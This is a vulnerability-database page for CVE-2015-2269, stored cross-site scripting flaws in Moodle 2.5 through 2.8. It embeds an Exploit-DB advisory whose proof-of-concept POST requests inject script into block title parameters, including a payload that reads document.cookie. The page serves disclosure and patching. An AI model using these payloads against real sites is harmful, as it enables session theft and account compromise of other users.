CVE-2015-2269 : Detail

CVE-2015-2269

Cross-site Scripting
A03-Injection
0.18%V3
Network
2015-06-01 17:00 +00:00
2015-06-01 17:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

Multiple cross-site scripting (XSS) vulnerabilities in lib/javascript-static.js in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allow remote authenticated users to inject arbitrary web script or HTML via a (1) alt or (2) title attribute in an IMG element.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metric Score Severity CVSS Vector Source
V2 3.5 AV:N/AC:M/Au:S/C:N/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 36418

Publication date : 2015-03-16 23:00 +00:00
Author : LiquidWorm
EDB Verified : No

 Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting Vendor: Moodle Pty Ltd Product web page: https://www.moodle.org Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9 Summary: Moodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalised learning environments. Desc: Moodle suffers from persistent XSS vulnerabilities. Input passed to the POST parameters 'config_title' and 'title' thru index.php, are not properly sanitized allowing the attacker to execute HTML or JS code into user's browser session on the affected site. Affected components: Blocks, Glossary, RSS and Tags. Tested on: nginx PHP/5.4.22 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5236 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php Vendor Advisory ID: MSA-15-0013 Vendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383 CVE ID: CVE-2015-2269 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269 09.02.2015 -- Random Glossary Entry --------------------- POST http://WEB/my/index.php HTTP/1.1 _qf__block_glossary_random_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=304 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_addentry=test config_invisible=test2 config_refresh=0 config_showconcept=1 config_title=" onmouseover=prompt("XSS1") > config_type=0 config_viewglossary=test3 mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Remote RSS Feeds ---------------- POST http://WEB/my/index.php HTTP/1.1 _qf__block_rss_client_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=312 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_block_rss_client_show_channel_image=0 config_block_rss_client_show_channel_link=0 config_display_description=0 config_rssid=_qf__force_multiselect_submission config_rssid[]=3 config_shownumentries=11 config_title=" onmouseover=prompt("XSS2") > mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Tags ---- POST http://WEB/my/index.php HTTP/1.1 _qf__block_tags_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=313 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_numberoftags=80 config_tagtype= config_title=Tags" onmouseover=prompt("XSS3") > mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Older not supported versions ---------------------------- POST http://WEB/blog/index.php HTTP/1.1 blockaction=config filterselect=1343 filtertype=user instanceid=4992 numberoftags=20 sesskey=0QCG5LQz0Q sort=name timewithin=90 title=ZSL"><script>alert(document.cookie);</script>

Products Mentioned

Configuraton 0

Moodle>>Moodle >> Version To (including) 2.5.9

Moodle>>Moodle >> Version 2.5.0

Moodle>>Moodle >> Version 2.5.1

Moodle>>Moodle >> Version 2.5.2

Moodle>>Moodle >> Version 2.5.3

Moodle>>Moodle >> Version 2.5.4

Moodle>>Moodle >> Version 2.5.5

Moodle>>Moodle >> Version 2.5.6

Moodle>>Moodle >> Version 2.5.7

Moodle>>Moodle >> Version 2.5.8

Moodle>>Moodle >> Version 2.6.0

Moodle>>Moodle >> Version 2.6.1

Moodle>>Moodle >> Version 2.6.2

Moodle>>Moodle >> Version 2.6.3

Moodle>>Moodle >> Version 2.6.4

Moodle>>Moodle >> Version 2.6.5

Moodle>>Moodle >> Version 2.6.6

Moodle>>Moodle >> Version 2.6.7

Moodle>>Moodle >> Version 2.6.8

Moodle>>Moodle >> Version 2.7.0

Moodle>>Moodle >> Version 2.7.1

Moodle>>Moodle >> Version 2.7.2

Moodle>>Moodle >> Version 2.7.3

Moodle>>Moodle >> Version 2.7.4

Moodle>>Moodle >> Version 2.7.5

Moodle>>Moodle >> Version 2.8.0

Moodle>>Moodle >> Version 2.8.1

Moodle>>Moodle >> Version 2.8.2

Moodle>>Moodle >> Version 2.8.3

References

http://openwall.com/lists/oss-security/2015/03/16/1
Tags : mailing-list, x_refsource_MLIST
Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.